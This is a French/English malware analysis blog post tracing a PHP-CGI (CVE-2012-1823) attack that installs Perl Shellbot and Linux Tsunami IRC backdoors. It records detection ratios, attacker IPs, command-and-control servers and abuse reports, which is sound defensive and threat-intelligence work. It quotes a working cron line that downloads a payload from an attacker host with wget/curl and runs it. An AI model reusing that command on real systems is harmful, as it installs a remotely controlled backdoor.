[fr/en] Backdoor.Perl.Shellbot.B et Backdoor.Linux.Tsunami.A

Je regardais les logs modsec de quelques serveurs, celui-ci a attiré mon attention :

PHP_attack

Une machine OVH 91.121.87.116 qui tente une attaque PHP-CGI (CVE-2012-1823 ), le script complet est disponible là : http://pjjoint.malekal.com/files.php?read=20140331_g13q9u5i11j6
Ce dernier test les connexions SSH, le script a pour but de dropper un shell sur la machine victime.

Un cron est créé :

* * * * * cd /tmp;if [ ! -f /tmp/.rtn ];then wget 216.151.163.154/img/glyph/.o/rtn -O /tmp/.rtn;fi;if [ ! -f /tmp/.rtn ];then curl -O -s 216.151.163.154/img/glyph/.o/rtn;mv rtn .rtn;fi;chmod +x /tmp/.rtn;/tmp/.rtn;sh /tmp/.rtn

Le script rtn : http://pjjoint.malekal.com/files.php?read=20140331_h11t10r7m10w13 va dropper un Trojan.Tsunam dans /tmp/.httpd

https://www.virustotal.com/fr/file/8a53397b477da72ce55f115adaf6b8b2012633c5f80fd96f1f338b496d45ca76/analysis/1396250584/
https://www.virustotal.com/fr/file/a0d96cf6f06d2f3e3ef5023213c2827f59b89d14a1a61829c69cfcdf4148ce23/analysis/1396251275/

SHA256: 91729ac3dab991cd612ef87bd05c14f6e6be7db52674b4493c36de7c33efff70
Nom du fichier : httpd.64
Ratio de détection : 10 / 50
Date d’analyse : 2014-03-31 07:25:10 UTC (il y a 0 minute)
AVG Linux/Tsunami.A 20140330
AntiVir BDS/Katien.R 20140331
Avast ELF:Tsunami-L [Trj] 20140331
CAT-QuickHeal Backdoor.Linux.Tsunami.A 20140330
ClamAV Trojan.Tsunami.B 20140331
Microsoft Backdoor:Linux/Tsunami.gen!A 20140331
Sophos Linux/Tsunami-A 20140331
Symantec Linux.Backdoor.Kaiten 20140331
TrendMicro ELF_MANUST.SM 20140331
TrendMicro-HouseCall ELF_MANUST.SM 20140331

Le script fait aussi un ftp sur 216.151.163.154 au cas où les adresses HTTP sont down ou bloqués par un Firewall :

PHP_attack2

Revenons à l’attaque initiale avec le ShellBot .bash_hist  : http://pjjoint.malekal.com/files.php?read=20140331_f10n15g14r12m11

https://www.virustotal.com/fr/file/a0d96cf6f06d2f3e3ef5023213c2827f59b89d14a1a61829c69cfcdf4148ce23/analysis/1396251275/

SHA256: a0d96cf6f06d2f3e3ef5023213c2827f59b89d14a1a61829c69cfcdf4148ce23
Nom du fichier : bla
Ratio de détection : 19 / 48
Date d’analyse : 2014-03-31 07:34:35 UTC (il y a 1 minute)
AVG PERL/ShellBot 20140330
Ad-Aware Backdoor.Perl.Shellbot.B 20140331
Agnitum Perl.Shellbot.I 20140330
AntiVir Perl/Shellbot.a.6 20140331
Avast Perl:Shellbot-T [Trj] 20140331
BitDefender Backdoor.Perl.Shellbot.B 20140331
GData Backdoor.Perl.Shellbot.B 20140331
Ikarus Backdoor.Perl.Shellbot 20140331
Kaspersky Backdoor.Perl.Shellbot.a 20140331
MicroWorld-eScan Backdoor.Perl.Shellbot.B 20140331
Microsoft Backdoor:Perl/Shellbot.S 20140331
NANO-Antivirus Trojan.Script.IRCBot.ehmdg 20140331
Norman Shellbot.D 20140331
Panda PHP/Santy.C 20140330
Rising NORMAL:Script.Perl.Shellbot.a!140294 20140330
Symantec IRC.Backdoor.Trojan 20140331
TotalDefense Perl/Shellbot.A 20140330
VIPRE Backdoor.Perl.IRCBot.a (v) 20140331
nProtect Backdoor.Perl.Shellbot.B 20140330

Le serveur se trouve en France : $servidor=’84.246.226.5′ unless $servidor;
Sur une connexion Netissime.

Bref au final, assez classique.

 

Je résume ici les machines utilisées pour contacter les abuses :

Machine attaquante OVH : 91.121.105.21
216.151.163.154/img/glyph/.o/.bash_hist (NET-NJTECH – US)
catalysts.linkpc.net/img/glyph/.o/httpd.86 (216.151.163.154)

NetRange: 216.151.160.0 – 216.151.175.255
CIDR: 216.151.160.0/20
OriginAS:
NetName: NET-NJTECH
NetHandle: NET-216-151-160-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
Comment: http://www.njtech.com
RegDate: 2006-07-20
Updated: 2012-03-02
Ref: http://whois.arin.net/rest/net/NET-216-151-160-0-1

EDIT – September 25 : deeper analysis

Others attempt probably from the same guy, example : http://www.malekal.com/modsec/index.php?ip=194.60.242.251
Someone write an analysis : http://n01g3l.tumblr.com/post/97207371876/peak-internet-isp-production-server-serving-cnc

The Perl.Shellbot connect to an IRCd at 194.24.228.203
The analysis stop to this cron :

Linux_Tsunami_cronThe cron download a script, this script download a Linux.Tsunami depending of the OS architecture

Linux_Tsunami_cron2

Linux_TsunamiThis Linux.Tsunami connect to an other IRCd at 37.59.48.97 (OVH) – the server seems to be hacked.
The DNS ending.publicvm.com

Linux_Tsunami2

The Botmaster is called by Kelevra (the nickname is also in the PHP.Shellbot Code), using a channel #Borgir
Linux_Tsunami4

194.24.228.203 has been suspended fast (09/16/2014)
The IRCd at 37.59.48.97 is still online, maybe it take sometimes as the server seems to be hacked.
ending.publicvm.com has been frozen with the help of MalwareMustDie.

Got an other attempt 3 days ago with the same Perl.Shellbot

Linux_Tsunami_others_attempt

The script has still not be updated and  still using 194.24.228.203 which has been suspended.

Linux_Tsunami_others_attempt2So seems to be Script Kiddie way.

(Visité 236 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Vous pouvez lire les articles et tutoriels suivants en rapport avec cette page :
Libérer de l'espace disqueMarmiton : se protéger des scripts malicieux

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com